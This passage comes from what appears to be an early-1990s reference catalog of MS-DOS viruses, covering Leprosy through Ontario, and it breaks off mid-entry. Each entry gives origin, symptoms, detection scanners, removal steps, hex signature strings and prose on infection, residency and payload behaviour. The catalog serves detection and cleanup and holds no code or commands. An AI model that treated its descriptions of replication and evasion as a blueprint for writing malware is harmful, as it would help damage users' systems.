               "NEWS FLASH!!  Your system has been infected with the
                incurable decay of LEPROSY 1.00, a virus invented by
                PCM2 in June of 1990.  Good luck!"

       The second message will only be displayed by one out of every seven
       .COM and .EXE files that the program infects.

       Since Leprosy is an overwriting virus, the programs which are
       infected with it will not function properly.  In fact, once they are
       infected with this virus they will run for awhile (while the virus is
       infecting other files) and then display one of the two messages.  The
       program execution will then end.

       If the system is booted from a diskette or hard drive that has Leprosy
       in its COMMAND.COM file, one of the above two messages will be
       displayed followed by:

               "Bad or missing Command Interpreter"

       This boot problem occurs because COMMAND.COM is no longer really
       COMMAND.COM.  The boot will not proceed until a system boot diskette
       is inserted into the system and another boot is attempted.

       While Leprosy's messages are encrypted in the virus, infected files
       can be found by checking for the following hex string near the
       beginning of the file:

               740AE8510046FE06F002EB08

       Infected files must be deleted and replaced with clean, uninfected
       copies.  There is no way to disinfect this virus since the first 666
       bytes of the file have been overwritten, the virus does not store
       those bytes anywhere else.

       Known variant(s) of the Leprosy virus are:
       Leprosy-B : The major differences between the Leprosy and Leprosy-B
               virus are that Leprosy-B uses a slightly different encryption
               method, thus allowing it to avoid detection once Leprosy was
               isolated.  Additionally, instead of infecting all programs in
               the directory selected for infection, Leprosy-B will infect
               four programs in the current directory each time an infected
               program is executed.  If four non-infected files do not exist
               in the current directory, it will move up one level in the
               directory structure and infect up to four files in that
               directory.  Like Leprosy, it overwrites the first 666 bytes
               of infected files.  The Leprosy message has been replaced
               with the following message:

               "ATTENTION!  Your computer has been afflicted with
                the incurable decay that is the fate wrought by
                Leprosy Strain B, a virus employing Cybernetic
                Mutation Technology (tm) and invented by PCM2  08/90."

       Leprosy-C : Also employs CMT, but with an added stealth characteristic
               of hooking interrupt 12.


 Virus Name:  Liberty
 Aliases:
 V Status:    Common
 Discovered:  May, 1990
 Symptoms:    .COM, .EXE, .OVL growth
 Origin:      Sydney, Australia
 Eff Length:  2,862 Bytes
 Type Code:   PRfAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions: VirHunt 2.0+, Clean-Up V72+, or Delete infected files
 General Comments:
       The Liberty Virus was isolated in Sydney, Australia in May, 1990.
       Liberty is a memory resident generic file infector, infecting
       .COM, .EXE, and overlay files.  COMMAND.COM may also become
       infected.

       The Liberty Virus gets its name from the text string "Liberty"
       which will appear in all infected files.  In .EXE files, it will
       be located in the last 3K of the file.  In .COM files, it will
       appear near the very beginning of the program, as well as within the
       last 3K of the infected file.

       The first time a file infected with the Liberty Virus is executed,
       the virus will become memory resident.  Liberty installs itself
       resident in high free memory, resulting in a decrease of 8,496 bytes
       of available free memory.  It also directly changes the interrupt
       map page in memory so that interrupts 21 and 24 will put the virus in
       control.  Total system memory does not change.

       After becoming memory resident, programs which are executed may
       be infected by the virus.  All .EXE files will be infected, but
       only .COM files over 2K in length will become infected.  Overlay
       files will also become infected.  Infected files will increase
       in size between 2,862 and 2,887 bytes, and will end with the hex
       character string: 80722D80FA81772880.  The main body of the virus will
       be located at the end of all infected files.

       Infected .COM files can also be identified by the following text
       string which will appear near the beginning of the infected program:

               "- M Y S T I C - COPYRIGHT (C) 1989-2000, by SsAsMsUsEsL"

       This string does not appear in infected .EXE files, the area where
       this string would have appeared in infected .EXE files will be 00h
       characters.

       Liberty is a self-encrypting virus.  It is not yet known if it
       is destructive.

       Known variant(s) of Liberty are:
       Liberty-B : Isolated in November, 1990, this strain is functionally
               similar to the original Liberty Virus.  The string which
               occurs at the end of all infected files has been changed
               to: C8004C40464842020EB.  The word "MAGIC" will also be found
               repeated together many times in infected files.
       Liberty-C : Isolated in January, 1991, this variant is very similar to
               Liberty-B, there are 16 bytes which have been changed.  Like
               Liberty-B, the word "MAGIC" will be found repeated together
               many times in infected files.  The string which occurs at the
               end of all infected files has been changed to:
               C8004C404648422020E9.


 Virus Name:  Lisbon
 Aliases:
 V Status:    Rare
 Discovered:  November, 1989
 Symptoms:    .COM growth, Unusable files (see text)
 Origin:      Lisbon, Portugal
 Eff Length:  648 bytes
 Type Code:   PNC - Parasitic Non-Resident COM Infector
 Detection Method:  ViruScan V49+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, Pro-Scan 1.4+, VirexPC, F-Prot, VirHunt 2.0+
 General Comments:
       The Lisbon virus is a strain of the Vienna virus first
       isolated by Jean Luz in Portugal in November, 1989.  The virus
       is very similar to Vienna, except that almost every word in
       the virus has been shifted 1-2 bytes in order to avoid virus
       identification/detection programs which could identify the
       Vienna virus.

       1 out of every 8 infected files will have the 1st 5 bytes of
       the 1st sector changed to "@AIDS", thus rendering the
       program unusable.

       Also see: Vienna


 Virus Name:  Little Pieces
 Aliases:     1374
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM & .EXE growth; decrease in available free memory; message;
              system hangs; unexpected screen clears
 Origin:      Italy
 Eff Length:  1,374 Bytes
 Type Code:   PRaE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected programs
 General Comments:
       The Little Pieces Virus was isolated in January, 1991, in Italy.  This
       virus is a 1,374 byte memory resident infector of .EXE files.

       The first time a program infected with Little Pieces is executed, the
       virus will install itself memory resident.  The area where it is memory
       resident is 1,392 bytes long and labelled COMMAND Data in low system
       memory.  Some memory mapping utilities will combine this area with the
       command interpretor, so the command interpretor will appear to be 1,392
       bytes longer than expected.  Interrupts 13, 16, and 21 are hooked by
       the Little Pieces Virus.

       Once Little Pieces is memory resident, it will infect .EXE programs
       as they are executed.  Infected .EXE programs will increase in size by
       1,374 bytes and have the virus located at the end of the infected
       file.  Infected files will not have their date and time in the disk
       directory altered.

       Systems infected with the Little Pieces Virus may experience the system
       display being cleared unexpectedly after a key is pressed on the
       keyboard.  The following message is usually displayed after the
       screen is cleared, though not always:

               "One of these days I'm going to cut you into little pieces"

       This message cannot be viewed in infected files as it is encrypted
       within the virus.

       Infected system may also experience unexpected system hangs occurring,
       requiring the system to be rebooted.  These hangs sometimes occur after
       the above message is displayed.


 Virus Name:  Lozinsky
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth; file date/time changes;
              decrease in total system and available free memory
 Origin:      USSR
 Eff Length:  1,023 Bytes
 Type Code:   PRtCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected programs
 General Comments:
       The Lozinsky Virus was submitted in December, 1990 from the USSR.
       Lozinsky is a memory resident infector of .COM files, including
       COMMAND.COM.

       When the first program infected with Lozinsky is executed, the virus
       will install itself memory resident at the top of system memory but
       below the 640K DOS boundary.  Interrupt 12's return will be moved so
       that the system will report 2,048 bytes of memory less than what is
       actually installed.  Interrupts 13 and 21 will be hooked by the virus.
       COMMAND.COM will also become infected at this time.

       After Lozinsky is memory resident, it will infect .COM files which are
       executed or openned for any reason.  Infected programs will show a file
       length increase of 1,023 bytes and have the virus located at the end
       of the program.  Their date and time in the disk directory will also
       have been updated to the system date and time when the program was
       infected by Lozinsky.

       It is unknown if Lozinsky does anything besides replicate.


 Virus Name:  Mardi Bros
 Aliases:
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    BSC; volume label change; decrease in system and free memory
 Origin:      France
 Eff Length:  N/A
 Type Code:   FR - Floppy Boot Sector Infector
 Detection Method:  ViruScan V66+
 Removal Instructions: M-Disk, or DOS SYS Command
 General Comments:
       The Mardi Bros Virus was isolated in July 1990 in France.  This virus
       is a memory resident infector of floppy disk boot sectors.  It does
       not infect hard disk boot sectors or partition tables.

       When a system is booted from a diskette infected with the Mardi Bros
       Virus, the virus will install itself memory resident.  It resides in
       7,168 bytes above the top of memory, but below the 640K DOS Boundary.
       The decrease in system and free memory can be seen using the DOS
       CHKDSK command, or several other memory mapping utilities.

       Mardi Bros will infect any non-write protected diskette which is
       exposed to the system.  Infected diskettes can be easily identified
       as their volume label will be changed to "Mardi Bros".  The CHKDSK
       program will show the following for the diskette's Volume label
       information:

            "Volume Mardi Bros created ira 0, 1980 12:00a"

       While the infected boot sector on the diskette will have the DOS
       messages still remaining, it will also include the following phrase
       near the end:

            "Sudah ada vaksin"

       It is unknown if Mardi Bros is destructive, it appears to do nothing
       but spread.

       Mardi Bros can be removed from infected diskettes by first powering
       off the system and rebooting from a known clean write protected
       DOS master diskette.  The DOS SYS command should then be used to
       replace the infected diskette's boot sector.  Alternately, MDisk
       can be used following the power-down and reboot.


 Virus Name:  MG
 Aliases:
 V Status:    New
 Discovered:  September, 1990
 Symptoms:    .COM file growth; DIR command may not function properly;
              File allocation errors; System hangs
 Origin:      Bulgaria
 Eff Length:  500 Bytes
 Type Code:   PRCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The MG Virus was submitted in January, 1991, though it has been
       mentioned by Bulgarian researchers several times since September, 1990.
       This virus is named MG as it was originally isolated at
       Matematicheska Gimnazia, a school in Varna, Bulgaria.  It is a memory
       resident infector of .COM files, including COMMAND.COM.

       The first time a program infected with MG is executed, the virus will
       install itself memory resident in a portion of the interrupt table in
       memory.  Interrupt 24 is hooked by the virus, as are several other
       interrupts.

       After MG is memory resident, it will infect programs when one of two
       things occurs: either the user attempts to execute any program, or a
       Dir command is performed.  In the case of a program being executed, the
       virus will infect one program in the current directory, though not
       necessarily the program being executed.  When a Dir command is executed,
       one program in the current directory will be infected as well.

       .COM programs infected with MG will increase in length by 500 bytes,
       though the file length increase will not be visible in a dir listing
       if the virus is memory resident.  File date and time in the disk
       directory are also not altered.  The virus will be located at the end
       of infected programs.

       Symptoms of a MG infection are that the DOS Chkdsk program will show
       File allocation errors on all infected .COM programs if the virus is
       present in memory.  The DOS Dir command may also not function properly,
       for example DIR A:*.COM will yield "File not found" even though .COM
       files exist on the A: drive.  At other times, pauses will occur in the
       disk directory being displayed by the Dir command.  Another symptom is
       that unexpected system hangs may occur due to the interrupt table being
       infected in memory.

       Also see: MG-2


 Virus Name:  MG-2
 Aliases:
 V Status:    New
 Discovered:  December, 1990
 Symptoms:    .COM file growth; File Allocation Errors;
              Dir command may not function properly
 Origin:      Bulgaria
 Eff Length:  500 Bytes
 Type Code:   PRsCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The MG-2 Virus was received in December, 1990, and is believed to have
       originated in Bulgaria.  This virus is a direct action, memory resident
       infector of .COM programs, including COMMAND.COM.

       When a program infected with the MG-2 Virus is first executed, the
       virus will install itself memory resident.  The DOS ChkDsk command,
       when executed on an infected system, will indicate that total system
       memory and available free memory have decreased by 55,104 bytes.  This
       virus remaps many interrupts, including interrupt 24.  A portion of the
       virus will also be resident above 640K if memory is available.

       After the MG-2 Virus is memory resident, it will infect one .COM
       program in the current directory each time an infected .COM program is
       executed.  Infected .COM programs will not show a file length increase
       if the virus is memory resident.  With the virus memory resident, the
       DOS ChkDsk command will indicate a file allocation error for all
       infected files.  Infected files actually increase 500 bytes in length
       and have the virus located at the end of the infected file.

       Systems infected with the MG-2 Virus may notice that the DOS Dir
       command does not always return the results expected.  For example,
       issuing a "DIR C:\DOS" command may result in the C: drive root directory
       being displayed instead of the C:\DOS directory. Another case is that
       issuing the command "DIR A:*.COM" will result in "File not found" though
       .COM files exist on that drive.

       Known variant(s) of MG-2 are:
       MG-3    : Functionally similar to MG-2, this variant has been altered
                 to avoid detection.  It is also 500 bytes in length.

       Also see: MG


 Virus Name:  MGTU
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth; excessive disk activity; file date/time changes;
              "????????COM Path not found." message
 Origin:      USSR
 Eff Length:  273 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The MGTU Virus was submitted in December, 1990 and came from the USSR.
       This virus is a non-resident direct action infector of .COM files,
       including COMMAND.COM.

       When a program infected with the MGTU Virus is executed, the virus will
       search the current drive and directory for uninfected .COM programs.
       All uninfected .COM programs will become infected with the virus.
       Infected .COM programs will have a file length increase of 273 bytes
       with the virus being located at the end of the file.  Their date and
       time in the disk directory will also have been updated to the system
       date and time when infection occurred.

       Infected systems will display excessive disk activity each time an
       infected program is executed.  This activity occurs because the virus
       is checking all of the .COM programs in the current directory to
       determine if they are already infected, or if they need to be infected.
       Infected systems may also experience the following message being
       displayed for no apparent reason:

               "????????COM Path not found."

        MGTU does not do anything besides replicate.


 Virus Name:  Microbes
 Aliases:
 V Status:    Common - India
 Discovered:  June, 1990
 Symptoms:    BSR
 Origin:      Bombay, India
 Eff Length:  N/A
 Type Code:   BR - Floppy and Hard Disk Boot Sector Infector
 Detection Method:  ViruScan V64+, Pro-Scan 1.4+
 Removal Instructions: M-Disk, Pro-Scan 1.4+, or DOS SYS Command
 General Comments:
       The Microbes virus was isolated in June, 1990 in India.  It is a
       memory resident boot sector infector of both floppy diskettes and
       hard disks.

       The Microbes virus becomes memory resident when a system is booted
       from a disk infected with the Microbes virus.  The system may hang
       on this boot, and inserted a diskette to boot from will result in
       this new diskette becoming infected.  At least on the author's XT
       test system, the system could not successfully boot with the
       Microbes virus present without powering off the system and rebooting
       from a write protected master boot diskette.

       As with other boot sector infectors, Microbes can be disinfected
       from diskettes and hard drives by powering off the system and
       booting from a known clean write protected master boot diskette
       for the system.  The DOS SYS command can then be used to recreate
       the boot sector on the diskette.


 Virus Name:  Mirror
 Aliases:
 V Status:    Rare
 Discovered:  October, 1990
 Symptoms:    .EXE growth; decrease in available free memory; mirror effect
              of display on activation
 Origin:      Unknown
 Eff Length:  927 Bytes
 Type Code:   PRhE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Mirror Virus was discovered in October, 1990.  This virus is a
       memory resident direct action infector of .EXE files.

       The first time a program infected with the Mirror Virus is executed,
       the virus will install itself memory resident at the top of free
       available memory.  Free available memory will decrease by 928 bytes,
       and the virus will hook interrupt 21.  At this time, the virus will
       also infect all other .EXE programs located in the current directory.
       Infected programs will increase in length by 927 to 940 bytes, with
       the virus being located at the end of the infected file.  Infected
       programs will also always end with the two text characters "IH".

       The Mirror Virus gets its name from its behavior.  Every once in awhile
       it will change the system's video display so that a mirror image of
       what was previously on the display appears.


 Virus Name:  MIX/1
 Aliases:     MIX1, Mix1
 V Status:    Rare
 Discovered:  August, 1989
 Symptoms:    TSR, .EXE growth, location 0:33C = 77h, garbled output
 Origin:      Israel
 Eff Length:  1,618 Bytes
 Type Code:   PRsE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan V37+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D, Virus Buster, Pro-Scan 1.4+, VirexPC 1.1B+,
              F-Prot, VirHunt 2.0+
 General Comments:
       The MIX1 Virus was originally isolated on August 22, 1989, on
       several BBSs in Israel.  This virus is a parasitic memory-
       resident .EXE file infector.  Once an infected program has been
       executed, the virus will take up 2,048 bytes in RAM.  Each
       .EXE file then executed will grow in length between 1,618 and
       1,634 bytes, depending on the original file size.  The virus
       will not, however, infect files of less than 8K in size.

       Infected files can be manually identified by a characteristic
       "MIX1" always being the last 4 bytes of an infected file.
       Using Debug, if byte 0:33C equals 77h, then the MIX1 virus is
       in memory.

       This virus will cause garbled output on both serial and
       parallel devices, as well as the num-lock being constantly
       on.  After the 6th infection, booting the system will crash
       the system due to a bug in the code, and a ball will start
       bouncing on the system monitor.

       There is a variant of this virus which does not have the
       problem of system crashes occurring, and will only infect files
       that are greater than 16K in length.

       Mix/1 has several code similarities to Icelandic, which it may
       have been derived from.

       Also see: Icelandic


 Virus Name:  Monxla
 Aliases:     Time Virus
 V Status:    Rare
 Discovered:  November, 1990
 Symptoms:    .COM growth; system hangs and/or reboots; program execution
              failures
 Origin:      Hungary
 Eff Length:  939 Bytes
 Type Code:   PRfCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Monxla, or Time, Virus was discovered in November, 1990 in Hungary.
       This virus is a memory resident direct action infector of .COM files,
       including COMMAND.COM.

       When a program infected with the Monxla Virus is executed, the virus
       will check the current system time.  If the system time's current
       seconds is greater than 32/100's of a second, the virus will install
       a very small portion of itself memory resident at the top of free
       memory but below the 640K DOS boundary.  The virus allocates 80 bytes,
       and will hook interrupts 20 and F2.  The F2 interrupt is later used to
       determine if the virus is in memory, thus avoiding multiple memory
       allocations.  The memory resident portion of the virus is not used to
       infect files.

       Each time a program infected with the Monxla Virus is executed, the
       virus will search for one uninfected .COM file with a length between
       3,840 and 64,000 bytes to infect.  The current directory is searched
       first, and then the directories along the system path.  Once an
       uninfected .COM file is found that satisfies the length requirement,
       the virus will infect it.  On other than the 13th day of any month,
       the virus will add its viral code to the end of the candidate file,
       increasing the file's length by 939 bytes.

       On the 13th day of any month, the virus activates.  The activation
       involves damaging the files that it infects based on the current
       seconds in the system time.  At the time the virus attempts to infect
       another .COM file, the virus will damage the file in one of three
       ways.  If the current seconds was greater than 60/100's, 4 HLTs followed
       by a random interrupt will be placed at the beginning of the file
       being infected.  Later when the program is executed, it may perform
       rather strangely be destructive.  It depends on what the random interrupt
       was.  If the current seconds was greater than 30/100's, but less than
       60/100's, two INT 19 calls are placed at the beginning of the file.
       Later when the program is executed, it will attempt to perform a warm
       reboot preserving the current interrupt vectors.  This, however, will
       result in a system hang if any interrupt between 00h and 1Ch was
       previously hooked.  If the current seconds was greater than 00/100's
       but less than 30/100's, a INT 20 call is placed at the beginning of
       the program being infected, thus resulting in it immediately terminating
       when later executed.


 Virus Name:  Monxla B
 Aliases:     Time B
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; File corruption
 Origin:      Hungary
 Eff Length:  535 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Monxla B Virus was isolated in January, 1991 in Hungary.  This virus
       is a non-resident direct action infector of .COM files, including
       COMMAND.COM.

       When a program infected with Monxla B is executed, the virus will check
       the seconds portion of the system time.  Depending on the value found,
       either one .COM program in the current directory will be infected, or
       one .COM program in the current directory will be corrupted.

       If the seconds portion of the system time is equal 0 or a multiple of 8,
       one .COM program in the current directory, or on the system path, will
       be corrupted by the first five characters of the selected .COM program
       being changed to the hex string: 004D004F4D, or " M OM" in text.
       Corrupted programs will not have a file length increase.  Later
       execution of these corrupted programs will usually result in the
       system being hung, requiring a reboot.

       If the seconds portion of the system time was not 0 or a multiple of 8,
       a .COM program in the current directory will be infected with Monxla B.
       If no programs exist in the current directory which are neither
       corrupted or infected, the virus will follow the system path to find a
       candidate program to infect.

       Infected .COM programs will increase in length by 535 bytes, the virus
       will be located at the end of infected programs.  The virus will also
       have changed the seconds in the file time in the disk directory to 58
       so that the virus can later tell that the file is infected.


 Virus Name:  Murphy
 Aliases:     Murphy-1, V1277, Stealth Virus
 V Status:    Common - Bulgaria
 Discovered:  April, 1990
 Symptoms:    .COM & .EXE growth, system hangs, speaker noise,
              possible bouncing ball effect (see Murphy-2 below)
 Origin:      Sofia, Bulgaria
 Eff Length:  1,277 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, F-Prot 1.12+
 Removal Instructions:  Scan/D, Pro-Scan 1.4+, or Delete infected files
 General Comments:
       The Murphy Virus was isolated in Bulgaria in April, 1990.  It is
       a memory resident generic .COM & .EXE infector, and will infect
       COMMAND.COM.

       The first time an infected program is executed on a system, the
       virus installs itself memory resident.  After it is memory resident,
       if a file is executed, or openned for any reason, it is infected by
       the Murphy Virus.  When the first non-infected program is executed
       with the virus in memory, the virus will attempt to infect
       COMMAND.COM.  The program being executed will also be infected at
       that time.  Infected programs will increase in length by
       1,277 Bytes.  Programs which are less than 1,277 Bytes in length
       will not be infected.

       The Murphy Virus watches the system time.  When the system time is
       between 10AM and 11AM, the virus will turn on the system speaker
       and send a 61h to it.  At any other time, the virus will not
       attempt to use the system speaker.

       The following text message is contained within the Murphy Virus,
       giving an idea of when it was written and by whom, though they are
       not displayed:

            "Hello, I'm Murphy.  Nice to meet you friend.
             I'm written since Nov/Dec.
             Copywrite (c)1989 by Lubo & Ian, Sofia, USM Laboratory."

       Systems infected by the Murphy Virus may also experience system
       hangs when the virus attempts to infect .EXE files.

       Known variant(s) of the Murphy Virus are:
       Murphy-2 or V1521 - Similar to the Murphy Virus, its length is 1,521
              Bytes.  The non-displayed messages in the virus are now:

             "It's me - Murphy.
              Copywrite (c)1990 by Lubo & Ian, Sofia, USM Laboratory."

              The Murphy-2 will infect any .EXE file, as well as any .COM
              file over 900 Bytes.  Instead of turning the system speaker
              on between 10AM and 11AM, this variant waits for the system
              time to have the minutes set to 00, then it may have a
              "bouncing ball" effect similar to several other viruses.
              This effect does not, however, occur on all systems.


 Virus Name:  MusicBug
 Aliases:     Music Boot, Music Bug
 V Status:    Common
 Discovered:  December, 1990
 Symptoms:    decrease in total system and available free memory; clicking;
              music randomly played on system speaker; lost clusters
 Origin:      Taiwan
 Eff Length:  N/A
 Type Code:   BRtX - Resident Boot Sector & Partition Table Infector
 Detection Method:  ViruScan V72+
 Removal Instructions:  Clean-Up V74+, or see below
 General Comments:
       The MusicBug Virus is a memory resident boot sector and partition table
       infector discovered in December, 1990.  It originated in Taiwan.

       When a system is booted from a diskette infected with the MusicBug
       Virus, the virus will install itself memory resident at the top of
       system memory but below the 640K DOS boundary.  The interrupt 12 return
       will be moved, so 640K systems will now report 638K of installed
       system memory.  Clicking may be heard for a short time from the system
       speaker before the boot proceeds, but more likely a section of a tune
       will be played.  The boot will then proceed.

       Once MusicBug is memory resident, it will periodically play another
       portion of the same tune when disk accesses occur.  It is thus rather
       disruptive.

       When MusicBug is memory resident, any disk accessed (including the
       system hard disk) will become infected with the virus.  In the case
       of hard disks, MusicBug infects the hard disk partition table and boot
       sector.

       Infected disks will have 4K in lost clusters which will contain the
       virus's code as well as a copy of the disk's original boot sector.
       The following text strings can also be found in these lost clusters:

               "MusicBug v1.06. MacroSoft Corp."
               "Made in Taiwan"

        Diskettes infected with the MusicBug Virus can be disinfected after
        powering off the system and booting from a write protected system
        diskette, then using the DOS SYS command.  The lost clusters can then
        be removed by using the ChkDsk command with the /F parameter.

        Hard disks, however, cannot be disinfected in the same way.  While
        the DOS SYS command will remove the virus from the hard disk's boot
        sector, and the lost clusters can be recovered, the hard disk will
        remain an unbootable non-system disk until a low-level format is
        performed.


 Virus Name:  New Jerusalem
 Aliases:
 V Status:    Rare
 Discovered:  October, 1989
 Symptoms:    TSR; .EXE, .COM, etc. (see below) growth; system slowdown; 
              deleted files on Friday 13th
 Origin:      Holland
 Eff Length:  1,813 Bytes (.COM) & 1,808 Bytes (.EXE)
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V45+, F-Prot, Pro-Scan 1.4+
 Removal Instructions:  Saturday, CleanUp, F-Prot, Pro-Scan 1.4+
 General Comments:
       New Jerusalem is a variation of the original Jerusalem virus
       which has been modified to be undetectable by ViruScan versions
       prior to V45 as well as IBM's VIRSCAN product as of October 20,
       1989.  The virus was first detected when it was uploaded to
       several BBSs in Holland beginning on October 14, 1989.  It
       infects both .EXE and .COM files and activates on any Friday The
       13th, deleting infected programs when they are attempted to be
       run.

       This virus is memory resident, and as with other Jerusalem
       viruses, may infect overlay, .SYS, .BIN, and .PIF files.

       Also see: Jerusalem, Jerusalem B, Payday, Suriv 3.00


 Virus Name:  Nina
 Aliases:
 V Status:    New
 Discovered:  December, 1990
 Symptoms:    .COM growth; decrease in total system and available free memory;
 Origin:      Bulgaria
 Eff Length:  256 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM & Infector
 Detection Method:  ViruScan V74+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Nina Virus was received in December, 1990, and is from Bulgaria.
       This virus is a memory resident infector of .COM files, including
       COMMAND.COM.

       When the first program infected with the Nina Virus is executed, Nina
       will install itself memory resident at the top of system memory but
       below the 640K DOS boundary.  Total system memory and available free
       memory will decrease by 1,024 bytes as shown by the DOS ChkDsk command.
       Interrupt 21 will be hooked by the virus.

       After Nina is memory resident, it will infect .COM programs that are
       greater than 256 bytes in length as they are executed.  If COMMAND.COM
       is executed, it will become infected.  Infected .COM programs increase
       in length by 256 bytes, and will have the virus located at the beginning
       of the infected file.

       The Nina Virus is named Nina because the virus contains the text
       string "Nina" within the viral code.

       This virus does not do anything besides replicate.


 Virus Name:  Nomenklatura
 Aliases:     Nomenclature, 1024-B
 V Status:    Rare
 Discovered:  August, 1990
 Symptoms:    .EXE, .COM growth; decrease in available free memory;
              "sector not found" messages on diskettes;
 Origin:      Netherlands
 Eff Length:  1,024 Bytes
 Type Code:   PRhAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D or Delete infected files
 General Comments:
       The Nomenklatura Virus was isolated in August, 1990 in the
       Netherlands.  This virus is a memory resident infector of .COM and
       .EXE files, including COMMAND.COM.  It is not related to the V1024
       virus, though it is the same length.

       The first time a program infected with the Nomenklatura Virus is
       executed on a system, the virus installs itself memory resident at
       the top of available system memory, but below the 640K DOS boundary.
       Available system memory will decrease by 1,024 bytes, and interrupt
       21 will be hooked by the virus.

       When the virus is memory resident, any .COM or .EXE program greater in
       length then approximately 1,023 bytes that is executed or openned
       for any reason will be infected by the Nomenklatura virus.  Infected
       files will have their file lengths increased by 1,024 bytes.  The
       virus does not hide the increase in file length when the disk directory
       is displayed.

       Attempts to execute uninfected programs from a write-protected diskette
       with the virus in memory will result in a "Sector not found error"
       message being displayed, and the program not being executed.

       The Nomenklatura Virus is destructive to the contents of diskettes
       exposed to infected systems.  File corruption will randomly occur,
       with the frequency increasing as the disk becomes more filled with data.
       The file errors may occur on data files as well program files.  This
       file corruption occurs due to the virus occassionally swapping a pair of
       words in the sector buffer.  It may also do this to critical system
       areas such as the FAT, boot sector, or directories since it may occur
       to any clusters on the disk.  If a file or critical system area was
       residing in a corrupted cluster, it will be corrupted.  As such, systems
       which has been exposed to the Nomenklatura Virus must be carefully
       checked as the integrity of non-infected programs and any datafiles
       should be considered suspect.

       The virus has been named Nomenklatura as this text string appears in
       all programs infected with this virus.


 Virus Name:  Number One
 Aliases:     Number 1
 V Status:    Extinct
 Discovered:  1987 (see below)
 Symptoms:    .COM files fail to function; <Smile> displayed
 Origin:      West Germany
 Eff Length:  12,032 Bytes
 Type Code:   ONC - Overwriting Non-Resident .COM Infector
 Detection Method:
 Removal Instructions:  Scan/D or Delete infected files
 General Comments:
       The Number One Virus was submitted for inclusion in this listing in
       September, 1990.  This virus, however, is not a new virus but is an
       extinct rather "old" virus.  The Number One Virus was written in
       October, 1987, by M. Vallen using Turbo Pascal 3.01A.  It is
       documented, complete with source, in a book by Ralf Burger.  This
       virus is an non-resident overwriting virus which infects .COM files.

       When a program infected with the Number One Virus is executed, the virus
       will infect the first uninfected .COM file it finds in the current
       directory.  If the .COM file was originally less than 12,032 bytes in
       length, it will now have a 12,032 bytes.  Infected files will also have
       their date/timestamps in the directory changed to reflect the time of
       infection.  After Number One has finished infecting a .COM file, it will
       display the message:

               "This File Has Been Infected by Number One!
                XXXXXXXX.COMinfected."

       The XXXXXXXX is the name of the .COM file that has just been infected
       by the virus.  When there are no more .COM files for Number One to
       infect in the current directory, it will display the following
       message:

                "This File Has Been Infected by Number One!
                 <Smile>"

       Number One will not infect any files which have the Read Only Attribute
       set.

       Since Number One is an overwriting virus, it is not possible to
       remove the virus from infected files and repair the damage.  Infected
       files should be erased and replaced with clean copies.


 Virus Name:  Ohio
 Aliases:
 V Status:    Common
 Discovered:  June, 1988
 Symptoms:    BSC, Resident TOM
 Origin:      Indonesia
 Eff Length:  N/A
 Type Code:   RtF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  MDisk, F-Prot, VirexPC, Pro-Scan 1.4+,
              or DOS SYS Command
 General Comments:
       The Ohio virus is a memory resident boot sector infector, only
       infecting 360K floppy disks.  The Ohio virus is similar in
       many respects to the Den Zuk virus, and is believed to possibly
       be the earlier version of Den Zuk.  A diskette infected with
       Ohio will be immune to infection by the Pakistani Brain virus.

       The following text strings appear in the Ohio virus:

                "V  I  R  U  S
                      b y
                  The Hackers
                  Y C 1 E R P
                 D E N Z U K 0
                 Bandung 40254
                   Indonesia

           (C) 1988, The Hackers Team...."

       Also see: Den Zuk


 Virus Name:  Ontario
 Aliases:
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    .COM & .EXE growth; decrease in system and free memory;
              hard disk errors in the case of extreme infections
 Origin:      Ontario, Canada
 Eff Length:  512 Bytes
 Type Code:   PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions:  SCAN /D, or Delete infected files
 General Comments:
       The Ontario Virus was isolated by Mike Shields in Ontario, Canada
       in July, 1990.  The Ontario virus is a memory resident infector of
       .COM, .EXE, and overlay files.  It will infect COMMAND.COM.

       The first time a program infected with the Ontario Virus is executed,
       it will install itself memory resident above the top of system memory
       but below the 640K DOS boundary.  Total system memory and free memory
